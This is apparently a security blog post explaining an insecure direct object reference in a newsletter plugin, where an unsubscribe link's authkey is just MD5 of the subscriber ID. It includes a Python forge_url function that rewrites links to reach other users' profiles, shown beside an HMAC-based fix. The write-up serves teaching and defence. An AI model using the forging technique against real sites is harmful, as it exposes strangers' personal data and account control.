HTTP Parameter Pollution

Take a typical newsletter from a local association as an example. Scrolling to the bottom of the e-mail, we find the standard “Unsubscribe” hyperlink:

Looking closer at the URL, there are a few parameters that immediately stand out:

https://www.example.org/manage-subscriptions/?method=unsubscribe&wpmlhistory_id=99&wpmlsubscriber_id=870&wpmlmailinglist_id=1&authkey=22fb0cee7e1f3bde58293de743871417

It is reasonable to assume that wpmlsubscriber_id is a unique user ID (UID) linked to the subscription account (perhaps we are the 870th subscriber?). To test this theory, let’s register for the same newsletter with a different e-mail address. The confirmation e-mail includes a hyperlink that looks like the following:

https://www.example.org/?newsletters_link=57874d6e4…4ee33d5a3f&subscriber_id=1243

Opening a private browser window to make sure we are logged out of everything, let’s take the original “Unsubscribe” hyperlink and make one minor change: the value of wpmlsubscriber_id goes from 870 to our new ID, 1243. The request is refused; an authorization wall presents itself:

Next, let’s turn our attention to the last parameter of the “Unsubscribe” URL: authkey=22fb0cee7e1f3bde58293de743871417. The parameter is aptly named, so it is safe to assume the value is tied to the user ID and acts as the authentication for the link. The value is 32 hex characters, the length of an MD5 digest, and a quick Google search confirms that it is simply the MD5 hash of the string “870”, the original UID.

With this information, we change the URL once more, keeping wpmlsubscriber_id=1243 but replacing the authkey value with the MD5 hash of the string “1243” (put simply: authkey = MD5(x), where x is the target UID). With the hashed target UID, the updated URL looks like the following:

https://www.example.org/manage-subscriptions/?method=unsubscribe&wpmlhistory_id=99&wpmlsubscriber_id=1243&wpmlmailinglist_id=1&authkey=e1d5be1c7f2f456670de3d53c7b54f4a

The page loads, and we have bypassed the authorization wall and landed directly on the target’s subscription management page:

From here we can click through into a fully logged-in account using the “Manage Subscriptions” link, which exposes all of the information stored in the profile (including the user’s full name, address, and telephone number).

In this scenario, simply changing the value of wpmlsubscriber_id (the user’s ID) and setting authkey to the MD5 hash of that ID lets anyone reach any user in the association’s database, control their subscription preferences, and harvest whatever personal information is attached to the profile. Strictly speaking, this is an insecure direct object reference (IDOR) protected only by a token derived from a public value with an unkeyed hash, rather than HTTP parameter pollution (supplying the same parameter more than once). The fix is to authorize the request server-side against the logged-in user and, for unauthenticated links such as unsubscribe, to issue a token that cannot be derived from the ID: a random per-subscriber value stored in the database, or a keyed HMAC computed with a server-side secret.
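The following Python is an added example written for this page, not code from the post or from the mailing-list plugin. It reproduces the forgery in a few lines (parse the link, swap the subscriber ID, recompute authkey = MD5(id)) and sets beside it a hypothetical hardened scheme in which the key is an HMAC over the ID under a server-side secret, so a new ID cannot be paired with a valid key. The parameter names come from the URL in the post; the sample link is constructed by the script rather than taken from a real mailing. To reproduce the finding yourself, run authkey_is_md5_of_id against the original “Unsubscribe” URL above.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

# Parameter names taken from the unsubscribe URL in the post.
ID_PARAM = "wpmlsubscriber_id"
KEY_PARAM = "authkey"


def query_param(url: str, name: str):
    """Return the first value of a query parameter, or None if absent."""
    return parse_qs(urlparse(url).query).get(name, [None])[0]


def weak_authkey(subscriber_id: str) -> str:
    """The scheme reverse-engineered in the post: authkey = MD5(subscriber_id)."""
    return hashlib.md5(subscriber_id.encode()).hexdigest()


def authkey_is_md5_of_id(url: str) -> bool:
    """Check whether a link's authkey is just the MD5 of its own subscriber id."""
    sid = query_param(url, ID_PARAM)
    key = query_param(url, KEY_PARAM)
    if sid is None or key is None:
        return False
    return key.lower() == weak_authkey(sid)


def forge_url(url: str, target_id: str) -> str:
    """Rewrite the subscriber id and recompute the matching weak authkey."""
    parts = urlparse(url)
    q = parse_qs(parts.query, keep_blank_values=True)
    q[ID_PARAM] = [target_id]
    q[KEY_PARAM] = [weak_authkey(target_id)]
    return urlunparse(parts._replace(query=urlencode(q, doseq=True)))


def build_weak_url(subscriber_id: str) -> str:
    """Constructed sample: an unsubscribe link issued under the weak scheme."""
    q = {"method": "unsubscribe", ID_PARAM: subscriber_id,
         KEY_PARAM: weak_authkey(subscriber_id)}
    return "https://www.example.org/manage-subscriptions/?" + urlencode(q)


# --- Hardened alternative (hypothetical; not the site's actual fix) ---------
# A keyed MAC over the id: without the server secret, an attacker cannot
# pair a chosen id with a valid key. A random per-subscriber token stored
# in the database works equally well; the essential property is that the
# key is not derivable from the public id.

def strong_authkey(subscriber_id: str, secret: bytes) -> str:
    return hmac.new(secret, subscriber_id.encode(), hashlib.sha256).hexdigest()


def server_accepts(subscriber_id: str, presented_key: str, secret: bytes) -> bool:
    """Server-side check; constant-time compare avoids a timing side channel."""
    expected = strong_authkey(subscriber_id, secret)
    return hmac.compare_digest(expected, presented_key)


if __name__ == "__main__":
    issued = build_weak_url("870")
    print("authkey is MD5(id):", authkey_is_md5_of_id(issued))
    print("forged link:", forge_url(issued, "1243"))
    secret = b"server-side secret, never sent to clients"
    print("hardened scheme accepts forged MD5 key:",
          server_accepts("1243", weak_authkey("1243"), secret))
```

Note that the HMAC only stops forgery of the link itself; the “Manage Subscriptions” page behind it still needs its own authorization check, otherwise a legitimate link for one account must never be able to reach another account’s data.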
